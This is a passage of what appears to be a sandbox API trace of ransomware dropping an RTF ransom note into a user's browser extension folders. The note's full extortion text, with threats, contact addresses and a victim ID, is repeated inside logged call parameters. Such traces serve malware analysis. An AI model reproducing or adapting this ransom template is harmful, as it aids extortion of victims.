Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.114] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.114] CloseHandle (hObject=0x2ec) returned 1 [0291.114] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\#readme_eman#.rtf")) returned 0xffffffff [0291.114] GetLastError () returned 0x2 [0291.114] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.115] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.115] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 